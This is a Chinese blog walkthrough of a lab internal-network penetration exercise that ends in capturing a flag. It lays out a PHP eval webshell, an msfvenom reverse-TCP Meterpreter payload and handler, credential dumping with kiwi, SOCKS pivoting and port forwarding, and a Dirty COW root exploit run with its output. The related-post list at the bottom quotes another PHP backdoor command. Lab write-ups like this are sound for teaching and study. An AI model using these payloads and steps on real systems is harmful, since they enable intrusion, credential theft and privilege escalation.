关于一次内网渗透总结

最新推荐文章于 2022-05-07 16:54:22 发布
最新推荐文章于 2022-05-07 16:54:22 发布
阅读量1.6k 收藏 2
点赞数
分类专栏: 靶机渗透 文章标签: hacks 渗透测试 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47975351/article/details/120534845
版权

一、靶机的环境搭配

攻击机(KALI):192.168.226.129

靶机(2008):  192.168.114.130

使用工具:burp、一句话木马、中国蚁剑、大马制作、路由转发、脏牛提权

1、配置靶场IP

点击win2008-编辑-虚拟机网络编辑器-

更改VMnet8,修改子网ip地址为192.168.114.0,应用保存

 

最后本机打开网络共享中心à更改适配器àVMnet8网卡à属性àIPv4协议 修改ip地址为192.168.114.1和默认网关192.168.114.2。

 

 

二、战前准备

1、扫描目标网段

命令:arp-scan -l 扫描局域网所有设备(所有设备IP、MAC地址、制造商信息)

arp-scan命令: 是一个用来进行系统发现的ARP命令行扫描工具(可以发现本地网络中的隐藏设备)它可以构造并发送ARP请求到指定的IP地址
并且显示返回的所有响应。
arp-scan 可以显示本地网络中的所有连接设备,即使这些设备有防火墙。防火墙设备可以屏蔽ping,但是并不能屏蔽ARP数据包。

 扫描到目标靶机192.168.114.130

二、目标信息收集

对方使用了操作系统是Windows server猜测可能开放了http服务,并且有个域,IP地址为192.168.114.5,发现不能直接访问这个网站,需要拿到130的webshell并设立跳板

三、网站页面收集

使用 dirb http://192.168.114.130寻找登录界面

三、渗透开始

1、设置代理,抓包修改账户

完成抓包后发送到repeater模块,修改用户名为admin,发送出去

 2、webshell的获取

登录admin账户

生成制作一句话木马<?php @eval($_POST['pass']);?>,写入PHP文件,最后压缩成zip文件

开始上传一句话木马,并用中国蚁剑连接

http://192.168.114.130/templates/a.php

制作大马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.114.129 LPORT=44444 -f exe -o test.exe  注意129为kali 的IP

3、启动MSF

msf6 exploit(multi/handler) > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) >  set lhost  192.168.114.129  本机IP
lhost => 192.168.114.129
msf6 exploit(multi/handler) > set lport 44444
lport => 44444
msf6 exploit(multi/handler) > exploit
 

 

4、更换进程为系统进程,并获取登录密码

ps

load kiwi

creds_all 

 3、配置路由

msf6 exploit(multi/handler) > use auxiliary/server/socks_proxy 
msf6 auxiliary(server/socks_proxy) >  set version 5
version => 5

msf6 auxiliary(server/socks_proxy) > set srvhost 192.168.114.129
srvhost => 192.168.114.129
msf6 auxiliary(server/socks_proxy) > run

对另一台主机的信息收集

proxychains nmap 192.168.114.1/24 -F

设置端口转发 portfwd add -l 2222 -p 22 -r 192.168.114.5

cd CVE-2016-5195 

scp * cqxxx@192.168.114.5:~ 复制文件并上传


登录执行漏洞

ssh cqxxx@192.168.114.5

yes

123456Aa!qaz

cqxxx@ubuntu:~$ ls
changelog  CONTRIBUTING.md  dcow.cpp  makefile  README.md  version
cqxxx@ubuntu:~$ make
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil
cqxxx@ubuntu:~$ ./dcow -s
Running ...
Password overridden to: dirtyCowFun

Received su prompt (Password: )

root@ubuntu:~# echo 0 > /proc/sys/vm/dirty_writeback_centisecs
root@ubuntu:~# \cp /tmp/.ssh_bak /etc/passwd
root@ubuntu:~# \rm /tmp/.ssh_bak
root@ubuntu:~# ls
flag.txt
root@ubuntu:~# cat flag.txt
147258369


里丘~班诺
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网渗透:结合实战个人思路总结
fuqinderen的博客
01-13 3013
内容: 信息收集,提权,代理搭建,域横向移动,哈希传递,票据制作,跨域攻击,上线方式 环境如下: 以钓鱼形式拿下第一台外网服务器,记得设置beacon响应为实时 首先打开一个记事本准备复制粘贴要用到的数据 可以看到我们不是最高权限,第一步肯定是要进行权限提升的,先进行主机信息的收集,查看主机的系统版本,修复的补丁 本电脑为win7 可以看到收集的信息为三级域名,三个补丁 指令: shell systeminfo 其他的先不多想,进行提权,根据版本信息和补丁,ms14_0..
内网之一次成功的内网渗透
shy的博客
10-09 975
虚拟网卡配置 环境问题: 虚拟机桥接获取不到IP地址,通过还原默认设置,指定物理网卡解决 靶机1,内网网卡获取不到IP地址,通过添加配置文件解决。 开始渗透: Kali:192.168.1.13 Centos7:192.168.1.16 192.168.22.11 扫端口 使用nmap 顺便扫漏洞 nmap -sS -A 192.168.101.91 --script=vuln 比较慢,没有截图 访问80 测试宝塔未授权访问漏洞,不存在 查看robots...
内网渗透基础知识点总结(二)
weixin_30807779的博客
07-07 339
域中计算机分类 • 域控制器• 成员服务器• 客户机• 独立服务器 • 域控制器是存放活动目录数据库的,是域中必须要有的,而其他三种则不是必须的,也就是说最简单的域可以只包含一台计算机,这台计算机就是该域的域控制器。 • 域中各个服务器的角色也是可以改变的,例如域服务器在删除活动目录时,如果是域中最后一个域控制器,则该域服务器会成为独立服务器,如果不是域中唯一的域控制器,则将使该...
渗透 Linux 入侵常用命令
Butterfly0011的博客
02-17 1596
渗透 Linux 入侵常用命令 写个php一句话后门上去: [jobcruit@wa64-054 rankup_log]$ echo -e “<?php @eval(\$_POST[md5])?>” >rankuplog_time.php [jobcruit@wa64-054 rankup_log]$ cat rankuplog_time.php 1、linux的想着先跨站 sh...
网络渗透试验一实验报告
weixin_51646864的博客
10-31 5661
网络渗透试验一实验报告 实验一 网络扫描与网络侦察 实验目的: 理解网络扫描、网络侦察的作用;通过搭建网络渗透测试平台,了解并熟悉常用搜索引擎、扫描工具的应用,通过信息收集为下一步渗透工作打下基础。 系统环境:Kali Linux 2、Windows 网络环境:交换网络结构 实验工具: Metasploitable2;Nmap(Kali);WinHex、数据恢复软件等 实验原理: 1、网络扫描与网络侦察的目的 搜集目标信息,采用七个基本的步骤: (1) 找到初始信息,比如一个IP地址或者一个域名; (2)
内网渗透一次记录 作者:Jaky.pdf
最新发布
04-08
本文基于《内网渗透一次记录》这一实战案例,详细解析了内网渗透的具体步骤和技术要点。 #### 二、环境准备 在进行内网渗透之前,需要做好充分的准备工作。主要包括生成远控木马、部署木马以及设置监听环境等...
记录一次国外某内网的实战过程.pdf
11-25
WEB安全、内网渗透
[ 内网渗透 ] 内网端口扫描.zip
02-11
内网渗透是网络安全领域中的一个重要话题,特别是在企业网络环境中,内网的安全性直接影响到公司的核心数据和业务运行。端口扫描是内网渗透的第一步,它可以帮助安全专家或红队成员发现网络上的开放服务,从而识别...
电脑教程内网渗透之内网穿透.rar
10-25
总结一下,内网穿透是解决内网设备与公网通信的重要技术,它涉及多种实现方法,包括UDP hole punching、TCP SYN proxy、STUN/TURN/ICE等。实际操作中,我们可以借助第三方服务或自行配置端口转发、DDNS等。但同时,...
一次授权任务的内网渗透 作者: 疯猫网络.pdf
04-08
### 一次授权任务的内网渗透 #### 一、前言 本文主要介绍了一次针对存在MS14-068漏洞的内部网络环境的授权渗透测试过程。渗透测试是在获得客户许可的情况下进行的安全评估活动,旨在发现并利用潜在的安全漏洞,以便...
9.CVE-2016-5195(脏牛)内核提权漏洞分析
weixin_30455365的博客
08-26 745
漏洞描述: 漏洞编号:CVE-2016-5195 漏洞名称:脏牛(Dirty COW) 漏洞危害:低权限用户利用该漏洞技术可以在全版本Linux系统上实现本地提权 影响范围:Linux内核>=2.6.22(2007年发行)开始就受影响了,直到2016年10月18日才修复。 360 Vulpecker Team:Android 7.0最新的10月补丁...
web渗透测试整理1(跨站脚本)
qq_40334963的博客
08-08 1274
跨站脚本构建模块 1.http://xxx/poll_skimcx.jsp?pollId=425?view=yes&aid=10483&mid=1 8.www.xxx/item/p/item.html?type="> 源码效果 9.www.0832xh.com/cmd.asp?act=gettburl&id=18"> 源码效果: 10.https://www.c...
prompt(1) to win -----XSS学习笔记
Assassin
08-13 1万+
一直不是很懂XSS,所以这里专门来学习一下下!记录做题的过程嗯。规则是当想办法嵌入prompt(1) 就算胜利了第0关什么过滤都没有,payload如下"><script>prompt(1)</script><"第1关—<> 过滤function escape(input) { // tags stripping mechanism from ExtJS library // Ext
msf添加路由及socks5代理
good good study
05-07 8338
msf 添加路由 socks代理 nmap在挂上socks代理时进行扫描 -sT -Pn
利用msf进行后渗透中常见的知识点
热门推荐
Shanfenglan's blog
10-28 9万+
内网代理 首先需要一个session 搭建路由 然后配置路由,比如我们配置让这个session来转发我们访问的172.16.250.0/24这个网段的所有流量。这时候我们需要在meterpreter里面执行 run autoroute -s 172.16.250.0/24 执行完后,可以将这个shell放到后台(利用bg命令)然后使用route print来查看配置是否成功,成功的范例如下: 配置socks5 这时候我们已经搭好了路由,但是还不能使用,这时候还需要创建一个socks5,然后通过pr
搭建内网靶场并用MSF进行内网穿透/渗透实验
Cwillchris的博客
10-17 4005
实验名称:利用MSF打穿内网 实验人:XX 实验日期:2021.10.16 实验目的:利用MSF进行内网渗透 实验拓扑: 实验环境: 所用机器 网络类型 IP 默认网关 DNS 攻击机:kali NAT 172.16.12.30/24 172.16.12.2 114.114.114.114
socks5搭建_[内网渗透]MSF之配合proxychains搭建socks5代理
weixin_39887577的博客
12-08 3125
使用MSF搭建socks5代理首先获得一个 meterpreter shell,然后使用 auxiliary/server/socks_proxy 模块搭建代理meterpreter > run autoroute -s 192.168.77.1/24 # 获取路由meterpreter > backgroundmsf5 > use auxiliary/server/...
内网全局代理工具及特征分析
systemino的博客
07-29 1440
简介 端口转发是点对点的方式,代理是点对面的方式,如果我们只需要访问主机的特定的端口,使用端口转发就够了,但通常在渗透进内网之后,我们还需要对整个内网进行横向渗透,这时代理必然是一个高校的方法。代理分为正向代理和反向代理,正向代理常适用于外网可以直接访问到web服务器的情况下,反向代理适用于服务器可以出网,但是外部无法直接访问服务器的情况,针对大型企业,现在几乎都是CDN,负载均衡等设备,所以个...
windows远程桌面连接家中电脑
菜鸟日记
06-19 1194
前情提要: 电信宽带300M 电信天翼光猫(1个千兆口,三个百兆口) TPLINK路由器(全千兆口) 光猫桥照扣
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值